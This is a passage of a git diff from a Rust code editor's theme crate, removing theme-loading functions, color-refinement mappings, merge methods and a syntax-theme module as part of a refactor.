load_user_themes(&self, themes_path: &Path, fs: Arc) -> Result<()> { - let mut theme_paths = fs - .read_dir(themes_path) - .await - .with_context(|| format!("reading themes from {themes_path:?}"))?; - - while let Some(theme_path) = theme_paths.next().await { - let Some(theme_path) = theme_path.log_err() else { - continue; - }; - - self.load_user_theme(&theme_path, fs.clone()) - .await - .log_err(); - } - - Ok(()) - } - - /// Loads the user theme from the specified path and adds it to the registry. - pub async fn load_user_theme(&self, theme_path: &Path, fs: Arc) -> Result<()> { - let theme = read_user_theme(theme_path, fs).await?; - - self.insert_user_theme_families([theme]); - - Ok(()) - } - /// Returns the default icon theme. pub fn default_icon_theme(&self) -> Result, IconThemeNotFoundError> { self.get_icon_theme(DEFAULT_ICON_THEME_NAME) @@ -273,18 +213,15 @@ impl ThemeRegistry { .retain(|name, _| !icon_themes_to_remove.contains(name)) } - /// Loads the icon theme from the specified path and adds it to the registry. + /// Loads the icon theme from the icon theme family and adds it to the registry. /// /// The `icons_root_dir` parameter indicates the root directory from which /// the relative paths to icons in the theme should be resolved against. - pub async fn load_icon_theme( + pub fn load_icon_theme( &self, - icon_theme_path: &Path, + icon_theme_family: IconThemeFamilyContent, icons_root_dir: &Path, - fs: Arc, ) -> Result<()> { - let icon_theme_family = read_icon_theme(icon_theme_path, fs).await?; - let resolve_icon_path = |path: SharedString| { icons_root_dir .join(path.as_ref()) diff --git a/crates/theme/src/schema.rs b/crates/theme/src/schema.rs index 61cf869b951ac4d285e1eaca42e226a6ac3e4a6a..56b89314a3442613890322cb7b9239fc7fc5b77e 100644 --- a/crates/theme/src/schema.rs +++ b/crates/theme/src/schema.rs @@ -1,30 +1,11 @@ #![allow(missing_docs)] -use gpui::{HighlightStyle, Hsla}; +use gpui::Hsla; use palette::FromColor; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; -use settings::IntoGpui; -pub use settings::{FontWeightContent, WindowBackgroundContent}; - -use crate::{StatusColorsRefinement, ThemeColorsRefinement}; - -fn ensure_non_opaque(color: Hsla) -> Hsla { - const MAXIMUM_OPACITY: f32 = 0.7; - if color.a <= MAXIMUM_OPACITY { - color - } else { - Hsla { - a: MAXIMUM_OPACITY, - ..color - } - } -} - -fn ensure_opaque(color: Hsla) -> Hsla { - Hsla { a: 1.0, ..color } -} +/// The appearance of a theme in serialized content. #[derive(Debug, PartialEq, Clone, Copy, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub enum AppearanceContent { @@ -32,819 +13,8 @@ pub enum AppearanceContent { Dark, } -/// The content of a serialized theme family. -#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] -pub struct ThemeFamilyContent { - pub name: String, - pub author: String, - pub themes: Vec, -} - -/// The content of a serialized theme. -#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] -pub struct ThemeContent { - pub name: String, - pub appearance: AppearanceContent, - pub style: settings::ThemeStyleContent, -} - -/// Returns the syntax style overrides in the [`ThemeContent`]. -pub fn syntax_overrides(this: &settings::ThemeStyleContent) -> Vec<(String, HighlightStyle)> { - this.syntax - .iter() - .map(|(key, style)| { - ( - key.clone(), - HighlightStyle { - color: style - .color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - background_color: style - .background_color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - font_style: style.font_style.map(|s| s.into_gpui()), - font_weight: style.font_weight.map(|w| w.into_gpui()), - ..Default::default() - }, - ) - }) - .collect() -} - -pub fn status_colors_refinement(colors: &settings::StatusColorsContent) -> StatusColorsRefinement { - StatusColorsRefinement { - conflict: colors - .conflict - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - conflict_background: colors - .conflict_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - conflict_border: colors - .conflict_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - created: colors - .created - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - created_background: colors - .created_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - created_border: colors - .created_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - deleted: colors - .deleted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - deleted_background: colors - .deleted_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - deleted_border: colors - .deleted_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - error: colors - .error - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - error_background: colors - .error_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - error_border: colors - .error_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hidden: colors - .hidden - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hidden_background: colors - .hidden_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hidden_border: colors - .hidden_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hint: colors - .hint - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hint_background: colors - .hint_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hint_border: colors - .hint_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ignored: colors - .ignored - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ignored_background: colors - .ignored_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ignored_border: colors - .ignored_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - info: colors - .info - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - info_background: colors - .info_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - info_border: colors - .info_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - modified: colors - .modified - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - modified_background: colors - .modified_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - modified_border: colors - .modified_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - predictive: colors - .predictive - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - predictive_background: colors - .predictive_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - predictive_border: colors - .predictive_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - renamed: colors - .renamed - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - renamed_background: colors - .renamed_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - renamed_border: colors - .renamed_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - success: colors - .success - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - success_background: colors - .success_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - success_border: colors - .success_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - unreachable: colors - .unreachable - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - unreachable_background: colors - .unreachable_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - unreachable_border: colors - .unreachable_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - warning: colors - .warning - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - warning_background: colors - .warning_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - warning_border: colors - .warning_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - } -} - -pub fn theme_colors_refinement( - this: &settings::ThemeColorsContent, - status_colors: &StatusColorsRefinement, -) -> ThemeColorsRefinement { - let border = this - .border - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let editor_document_highlight_read_background = this - .editor_document_highlight_read_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let scrollbar_thumb_background = this - .scrollbar_thumb_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or_else(|| { - this.deprecated_scrollbar_thumb_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - }); - let scrollbar_thumb_hover_background = this - .scrollbar_thumb_hover_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let scrollbar_thumb_active_background = this - .scrollbar_thumb_active_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_background); - let scrollbar_thumb_border = this - .scrollbar_thumb_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let element_hover = this - .element_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let panel_background = this - .panel_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let search_match_background = this - .search_match_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let search_active_match_background = this - .search_active_match_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(search_match_background); - ThemeColorsRefinement { - border, - border_variant: this - .border_variant - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_focused: this - .border_focused - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_selected: this - .border_selected - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_transparent: this - .border_transparent - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_disabled: this - .border_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - elevated_surface_background: this - .elevated_surface_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - surface_background: this - .surface_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - background: this - .background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_background: this - .element_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_hover, - element_active: this - .element_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_selected: this - .element_selected - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_disabled: this - .element_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_selection_background: this - .element_selection_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - drop_target_background: this - .drop_target_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - drop_target_border: this - .drop_target_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_background: this - .ghost_element_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_hover: this - .ghost_element_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_active: this - .ghost_element_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_selected: this - .ghost_element_selected - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_disabled: this - .ghost_element_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text: this - .text - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_muted: this - .text_muted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_placeholder: this - .text_placeholder - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_disabled: this - .text_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_accent: this - .text_accent - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon: this - .icon - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_muted: this - .icon_muted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_disabled: this - .icon_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_placeholder: this - .icon_placeholder - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_accent: this - .icon_accent - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - debugger_accent: this - .debugger_accent - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - status_bar_background: this - .status_bar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - title_bar_background: this - .title_bar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - title_bar_inactive_background: this - .title_bar_inactive_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - toolbar_background: this - .toolbar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - tab_bar_background: this - .tab_bar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - tab_inactive_background: this - .tab_inactive_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - tab_active_background: this - .tab_active_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - search_match_background: search_match_background, - search_active_match_background: search_active_match_background, - panel_background, - panel_focused_border: this - .panel_focused_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_indent_guide: this - .panel_indent_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_indent_guide_hover: this - .panel_indent_guide_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_indent_guide_active: this - .panel_indent_guide_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_overlay_background: this - .panel_overlay_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(panel_background.map(ensure_opaque)), - panel_overlay_hover: this - .panel_overlay_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(panel_background - .zip(element_hover) - .map(|(panel_bg, hover_bg)| panel_bg.blend(hover_bg)) - .map(ensure_opaque)), - pane_focused_border: this - .pane_focused_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - pane_group_border: this - .pane_group_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(border), - scrollbar_thumb_background, - scrollbar_thumb_hover_background, - scrollbar_thumb_active_background, - scrollbar_thumb_border, - scrollbar_track_background: this - .scrollbar_track_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - scrollbar_track_border: this - .scrollbar_track_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - minimap_thumb_background: this - .minimap_thumb_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_background.map(ensure_non_opaque)), - minimap_thumb_hover_background: this - .minimap_thumb_hover_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_hover_background.map(ensure_non_opaque)), - minimap_thumb_active_background: this - .minimap_thumb_active_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_active_background.map(ensure_non_opaque)), - minimap_thumb_border: this - .minimap_thumb_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_border), - editor_foreground: this - .editor_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_background: this - .editor_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_gutter_background: this - .editor_gutter_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_subheader_background: this - .editor_subheader_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_active_line_background: this - .editor_active_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_highlighted_line_background: this - .editor_highlighted_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_debugger_active_line_background: this - .editor_debugger_active_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_line_number: this - .editor_line_number - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_hover_line_number: this - .editor_hover_line_number - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_active_line_number: this - .editor_active_line_number - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_invisible: this - .editor_invisible - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_wrap_guide: this - .editor_wrap_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_active_wrap_guide: this - .editor_active_wrap_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_indent_guide: this - .editor_indent_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_indent_guide_active: this - .editor_indent_guide_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_document_highlight_read_background, - editor_document_highlight_write_background: this - .editor_document_highlight_write_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_document_highlight_bracket_background: this - .editor_document_highlight_bracket_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `editor.document_highlight.read_background`, for backwards compatibility. - .or(editor_document_highlight_read_background), - terminal_background: this - .terminal_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_background: this - .terminal_ansi_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_foreground: this - .terminal_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_bright_foreground: this - .terminal_bright_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_dim_foreground: this - .terminal_dim_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_black: this - .terminal_ansi_black - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_black: this - .terminal_ansi_bright_black - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_black: this - .terminal_ansi_dim_black - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_red: this - .terminal_ansi_red - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_red: this - .terminal_ansi_bright_red - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_red: this - .terminal_ansi_dim_red - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_green: this - .terminal_ansi_green - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_green: this - .terminal_ansi_bright_green - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_green: this - .terminal_ansi_dim_green - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_yellow: this - .terminal_ansi_yellow - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_yellow: this - .terminal_ansi_bright_yellow - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_yellow: this - .terminal_ansi_dim_yellow - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_blue: this - .terminal_ansi_blue - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_blue: this - .terminal_ansi_bright_blue - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_blue: this - .terminal_ansi_dim_blue - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_magenta: this - .terminal_ansi_magenta - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_magenta: this - .terminal_ansi_bright_magenta - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_magenta: this - .terminal_ansi_dim_magenta - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_cyan: this - .terminal_ansi_cyan - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_cyan: this - .terminal_ansi_bright_cyan - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_cyan: this - .terminal_ansi_dim_cyan - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_white: this - .terminal_ansi_white - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_white: this - .terminal_ansi_bright_white - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_white: this - .terminal_ansi_dim_white - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - link_text_hover: this - .link_text_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - version_control_added: this - .version_control_added - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `created`, for backwards compatibility. - .or(status_colors.created), - version_control_deleted: this - .version_control_deleted - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `deleted`, for backwards compatibility. - .or(status_colors.deleted), - version_control_modified: this - .version_control_modified - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `modified`, for backwards compatibility. - .or(status_colors.modified), - version_control_renamed: this - .version_control_renamed - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `modified`, for backwards compatibility. - .or(status_colors.modified), - version_control_conflict: this - .version_control_conflict - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `ignored`, for backwards compatibility. - .or(status_colors.ignored), - version_control_ignored: this - .version_control_ignored - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `conflict`, for backwards compatibility. - .or(status_colors.ignored), - version_control_word_added: this - .version_control_word_added - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - version_control_word_deleted: this - .version_control_word_deleted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - #[allow(deprecated)] - version_control_conflict_marker_ours: this - .version_control_conflict_marker_ours - .as_ref() - .or(this.version_control_conflict_ours_background.as_ref()) - .and_then(|color| try_parse_color(color).ok()), - #[allow(deprecated)] - version_control_conflict_marker_theirs: this - .version_control_conflict_marker_theirs - .as_ref() - .or(this.version_control_conflict_theirs_background.as_ref()) - .and_then(|color| try_parse_color(color).ok()), - vim_normal_background: this - .vim_normal_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_insert_background: this - .vim_insert_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_replace_background: this - .vim_replace_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_background: this - .vim_visual_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_line_background: this - .vim_visual_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_block_background: this - .vim_visual_block_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_yank_background: this - .vim_yank_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(editor_document_highlight_read_background), - vim_helix_normal_background: this - .vim_helix_normal_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_helix_select_background: this - .vim_helix_select_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_normal_foreground: this - .vim_normal_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_insert_foreground: this - .vim_insert_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_replace_foreground: this - .vim_replace_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_foreground: this - .vim_visual_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_line_foreground: this - .vim_visual_line_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_visual_block_foreground: this - .vim_visual_block_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_helix_normal_foreground: this - .vim_helix_normal_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - vim_helix_select_foreground: this - .vim_helix_select_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - } -} - -pub(crate) fn try_parse_color(color: &str) -> anyhow::Result { +/// Parses a color string into an [`Hsla`] value. +pub fn try_parse_color(color: &str) -> anyhow::Result { let rgba = gpui::Rgba::try_from(color)?; let rgba = palette::rgb::Srgba::from_components((rgba.r, rgba.g, rgba.b, rgba.a)); let hsla = palette::Hsla::from_color(rgba); diff --git a/crates/theme/src/styles/accents.rs b/crates/theme/src/styles/accents.rs index 7e42ffe2e5bfa6449a64203ffcd5e49720382d06..751a12849d62c3a08fc274b2ff2f12b0fa3280cc 100644 --- a/crates/theme/src/styles/accents.rs +++ b/crates/theme/src/styles/accents.rs @@ -5,7 +5,6 @@ use serde::Deserialize; use crate::{ amber, blue, cyan, gold, grass, indigo, iris, jade, lime, orange, pink, purple, tomato, - try_parse_color, }; /// A collection of colors that are used to color indent aware lines in the editor. @@ -66,25 +65,4 @@ impl AccentColors { pub fn color_for_index(&self, index: u32) -> Hsla { self.0[index as usize % self.0.len()] } - - /// Merges the given accent colors into this [`AccentColors`] instance. - pub fn merge(&mut self, accent_colors: &[settings::AccentContent]) { - if accent_colors.is_empty() { - return; - } - - let colors = accent_colors - .iter() - .filter_map(|accent_color| { - accent_color - .0 - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - }) - .collect::>(); - - if !colors.is_empty() { - self.0 = Arc::from(colors); - } - } } diff --git a/crates/theme/src/styles/players.rs b/crates/theme/src/styles/players.rs index 439dbdd437aa64e034004a4495e64a96e76ce87e..9699bf87a552e430a6bd6adb4ae8307228f35422 100644 --- a/crates/theme/src/styles/players.rs +++ b/crates/theme/src/styles/players.rs @@ -3,7 +3,7 @@ use gpui::Hsla; use serde::Deserialize; -use crate::{amber, blue, jade, lime, orange, pink, purple, red, try_parse_color}; +use crate::{amber, blue, jade, lime, orange, pink, purple, red}; #[derive(Debug, Clone, Copy, Deserialize, Default, PartialEq)] pub struct PlayerColor { @@ -148,40 +148,4 @@ impl PlayerColors { let len = self.0.len() - 1; self.0[(participant_index as usize % len) + 1] } - - /// Merges the given player colors into this [`PlayerColors`] instance. - pub fn merge(&mut self, user_player_colors: &[settings::PlayerColorContent]) { - if user_player_colors.is_empty() { - return; - } - - for (idx, player) in user_player_colors.iter().enumerate() { - let cursor = player - .cursor - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let background = player - .background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let selection = player - .selection - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - - if let Some(player_color) = self.0.get_mut(idx) { - *player_color = PlayerColor { - cursor: cursor.unwrap_or(player_color.cursor), - background: background.unwrap_or(player_color.background), - selection: selection.unwrap_or(player_color.selection), - }; - } else { - self.0.push(PlayerColor { - cursor: cursor.unwrap_or_default(), - background: background.unwrap_or_default(), - selection: selection.unwrap_or_default(), - }); - } - } - } } diff --git a/crates/theme/src/styles/syntax.rs b/crates/theme/src/styles/syntax.rs index 6a1615387835e0db1aefa03c63efd5c27ca2518d..b5c0a3016439e500c76e9b24775a137ddea7bbaa 100644 --- a/crates/theme/src/styles/syntax.rs +++ b/crates/theme/src/styles/syntax.rs @@ -1,203 +1 @@ -#![allow(missing_docs)] - -use std::sync::Arc; - -use gpui::{HighlightStyle, Hsla}; - -#[derive(Debug, PartialEq, Eq, Clone, Default)] -pub struct SyntaxTheme { - pub highlights: Vec<(String, HighlightStyle)>, -} - -impl SyntaxTheme { - #[cfg(any(test, feature = "test-support"))] - pub fn new_test(colors: impl IntoIterator) -> Self { - Self::new_test_styles(colors.into_iter().map(|(key, color)| { - ( - key, - HighlightStyle { - color: Some(color), - ..Default::default() - }, - ) - })) - } - - #[cfg(any(test, feature = "test-support"))] - pub fn new_test_styles( - colors: impl IntoIterator, - ) -> Self { - Self { - highlights: colors - .into_iter() - .map(|(key, style)| (key.to_owned(), style)) - .collect(), - } - } - - pub fn get(&self, name: &str) -> HighlightStyle { - self.highlights - .iter() - .find_map(|entry| if entry.0 == name { Some(entry.1) } else { None }) - .unwrap_or_default() - } - - pub fn get_opt(&self, name: &str) -> Option { - self.highlights - .iter() - .find_map(|entry| if entry.0 == name { Some(entry.1) } else { None }) - } - - pub fn color(&self, name: &str) -> Hsla { - self.get(name).color.unwrap_or_default() - } - - pub fn highlight_id(&self, name: &str) -> Option { - let ix = self.highlights.iter().position(|entry| entry.0 == name)?; - Some(ix as u32) - } - - /// Returns a new [`Arc`] with the given syntax styles merged in. - pub fn merge(base: Arc, user_syntax_styles: Vec<(String, HighlightStyle)>) -> Arc { - if user_syntax_styles.is_empty() { - return base; - } - - let mut merged_highlights = base.highlights.clone(); - - for (name, highlight) in user_syntax_styles { - if let Some((_, existing_highlight)) = merged_highlights - .iter_mut() - .find(|(existing_name, _)| existing_name == &name) - { - existing_highlight.color = highlight.color.or(existing_highlight.color); - existing_highlight.font_weight = - highlight.font_weight.or(existing_highlight.font_weight); - existing_highlight.font_style = - highlight.font_style.or(existing_highlight.font_style); - existing_highlight.background_color = highlight - .background_color - .or(existing_highlight.background_color); - existing_highlight.underline = highlight.underline.or(existing_highlight.underline); - existing_highlight.strikethrough = - highlight.strikethrough.or(existing_highlight.strikethrough); - existing_highlight.fade_out = highlight.fade_out.or(existing_highlight.fade_out); - } else { - merged_highlights.push((name, highlight)); - } - } - - Arc::new(Self { - highlights: merged_highlights, - }) - } -} - -#[cfg(test)] -mod tests { - use gpui::FontStyle; - - use super::*; - - #[test] - fn test_syntax_theme_merge() { - // Merging into an empty `SyntaxTheme` keeps all the user-defined styles. - let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([])), - vec![ - ( - "foo".to_string(), - HighlightStyle { - color: Some(gpui::red()), - ..Default::default() - }, - ), - ( - "foo.bar".to_string(), - HighlightStyle { - color: Some(gpui::green()), - ..Default::default() - }, - ), - ], - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::green()) - ])) - ); - - // Merging empty user-defined styles keeps all the base styles. - let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::blue()), - ("foo.bar", gpui::red()), - ])), - Vec::new(), - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::blue()), - ("foo.bar", gpui::red()) - ])) - ); - - let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::green()), - ])), - vec![( - "foo.bar".to_string(), - HighlightStyle { - color: Some(gpui::yellow()), - ..Default::default() - }, - )], - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::yellow()) - ])) - ); - - let syntax_theme = SyntaxTheme::merge( - Arc::new(SyntaxTheme::new_test([ - ("foo", gpui::red()), - ("foo.bar", gpui::green()), - ])), - vec![( - "foo.bar".to_string(), - HighlightStyle { - font_style: Some(FontStyle::Italic), - ..Default::default() - }, - )], - ); - assert_eq!( - syntax_theme, - Arc::new(SyntaxTheme::new_test_styles([ - ( - "foo", - HighlightStyle { - color: Some(gpui::red()), - ..Default::default() - } - ), - ( - "foo.bar", - HighlightStyle { - color: Some(gpui::green()), - font_style: Some(FontStyle::Italic), - ..Default::default() - } - ) - ])) - ); - } -} +pub use 